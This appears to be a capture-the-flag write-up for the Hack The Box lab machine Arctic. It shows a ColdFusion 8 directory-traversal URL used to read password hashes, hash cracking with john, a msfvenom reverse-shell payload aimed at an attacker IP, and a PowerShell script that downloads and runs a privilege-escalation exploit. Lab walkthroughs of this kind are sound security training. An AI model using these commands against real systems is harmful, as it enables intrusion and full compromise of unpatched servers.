Hack the box Arctic writeup

2
(1)
Hack the box Arctic writeup

Steps involved

1-Port scanning
2-Exploiting ColdFusion 8 on port 8500
3-Cracking hash
4-uploading reverse shell
5-privilage escalation
6-Getting root.txt

Commands Used

1-nmap -sC -sV -O -p- -v -oV 10.10.10.11
2-hash-identifier
3-john hash --wordlist=/root/Desktop/rockyou.txt
4-echo $webclient = New-Object System.Net.WebClient >>wget.ps1
5-echo $url = "http://10.10.14.20:8000/Chimichurri.exe" >>wget.ps1
6-echo $file = "exploit.exe" >>wget.ps1
7- echo $webclient.DownloadFile($url,$file) >>wget.ps1
8-powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Port Scanning

Nmap 7.70 scan initiated Wed Apr 15 06:05:15 2020 as: nmap -sC -sV -O -p- -v -oV 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up (0.29s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
8500/tcp open fmtp?
49154/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|8.1|7|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012:r2
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows Server 2008 (90%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.010 days (since Wed Apr 15 06:00:03 2020)
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done at Wed Apr 15 06:13:57 2020 -- 1 IP address (1 host up) scanned in 522.16 seconds

Exploiting ColdFusion 8 on port 8500

The one service which stands out or looks odd is on port 8500 fmtp.

So lets google it.

FMTP=   Flight message transfer protocol address coordination

And on visiting that service got this page .

It is running Adobe ColdFusion 8 hence i searched exploits for it.

and got this https://www.exploit-db.com/exploits/14641

http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
Hack the box Arctic writeup

So now er have the hash so lets check which kind of hash it is using hash-identifier .

Cracking hash

Hack the box Arctic writeup

I used john the ripper to crack it.

Hack the box Arctic writeup

Got the password as happyday now let’s login.

uploading reverse shell

Hack the box Arctic writeup

Here is a option of task scheduling through which we can upload our payload and get a reverse shell.

 msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=4444 -f raw > shell.jsp
Hack the box Arctic writeup
Hack the box Arctic writeup

Click on the run icon.

Then visit

http://10.10.10.11:8500/CFIDE/shell.jsp

And you will get shell on your nc.

Hack the box Arctic writeup

privilage escalation

Now checking system info.

C:\Users\tolis\Desktop>systeminfo
systeminfo
Host Name: ARCTIC
OS Name: Microsoft Windows Server 2008 R2 Standard
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 55041-507-9857321-84451
Original Install Date: 22/3/2017, 11:09:45 ��
System Boot Time: 16/4/2020, 9:01:45 ��
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
[02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 273 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.156 MB
Virtual Memory: In Use: 891 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.11

used windows exploit suggester and found a exploit.

https://www.exploit-db.com/exploits/14610
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/14610.zip.
https://github.com/Re4son/Chimichurri

Now just follow the script .

echo $webclient = New-Object System.Net.WebClient >>wget.ps1
echo $url = "http://10.10.14.20:8000/Chimichurri.exe" >>wget.ps1
echo $file = "exploit.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1
powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Getting root.txt

Hack the box Arctic writeup
Hack the box Arctic writeup

How useful was this post?

Click on a star to rate it!

Average rating 2 / 5. Vote count: 1

No votes so far! Be the first to rate this post.

As you found this post useful...

Follow us on social media!

We are sorry that this post was not useful for you!

Let us improve this post!

Tell us how we can improve this post?

Leave a Comment

X
wpChatIcon
0 Shares
Tweet
Share
Share
Pin